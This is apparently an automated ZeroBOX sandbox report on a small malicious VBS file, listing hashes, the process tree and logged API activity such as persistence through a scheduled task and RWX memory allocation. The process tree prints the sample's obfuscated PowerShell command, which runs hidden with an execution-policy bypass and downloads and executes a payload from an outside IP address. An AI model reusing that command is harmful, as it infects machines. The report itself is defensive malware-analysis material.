Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 20, 2023, 5:35 p.m.	Oct. 20, 2023, 5:38 p.m.

Size	1.6KB
Type	ASCII text, with CRLF line terminators
MD5	`7a6846a31383bb152f865c2ebe64cad4`
SHA256	`117edfe7b4aebf8dc6738b773ed0c03f44b36d6f1d7e5bcbe28096ff8861b236`
CRC32	`C7C02127`
ssdeep	`24:bN3bGdoQ17X0Lo+DzsTMnYkRI5vZraTidmYRjFwqa+4qr7:bNgoQJCoseMTRShrSa`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\T2Gen.txt.vbs
2056
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2152

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.81.157.213	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:34 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 20, 2023, 5:34 p.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: The term 'ï»¿$Content' is not recognized as the name of a cmdlet, function, scr console_handle: 0x00000023	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: ipt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: At line:1 char:12 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: + ï»¿$Content <<<< = @' console_handle: 0x00000053	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: + CategoryInfo : ObjectNotFound: (ï»¿$Content:String) [], Command console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: NotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: Name : Sounds Configrations console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: Path : \Sounds Configrations console_handle: 0x00000093	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: State : 3 console_handle: 0x00000097	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: Enabled : True console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000009f	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: LastTaskResult : 1 console_handle: 0x000000a3	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: NextRunTime : 2023-10-20 오후 10:36:19 console_handle: 0x000000ab	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: Definition : System.__ComObject console_handle: 0x000000af	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x000000b7	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <RegistrationInfo> console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x000000c3	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: n> console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: </RegistrationInfo> console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Triggers> console_handle: 0x000000cf	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <TimeTrigger> console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Repetition> console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x000000db	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x000000df	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: </Repetition> console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <StartBoundary>2023-10-20T22:34:19</StartBoundary> console_handle: 0x000000e7	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: </TimeTrigger> console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: </Triggers> console_handle: 0x000000f3	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Settings> console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: olicy> console_handle: 0x000000ff	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x00000103	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: tteries> console_handle: 0x00000107	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x0000010b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x00000113	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x00000117	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: lable> console_handle: 0x0000011b	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <IdleSettings> console_handle: 0x0000011f	1	1
WriteConsoleW Oct. 20, 2023, 5:34 p.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x00000123	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cafb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb3b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb6b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb778 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:34 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cb838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 20, 2023, 5:34 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02811000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02813000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02814000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02815000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02816000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02817000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:34 p.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02818000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
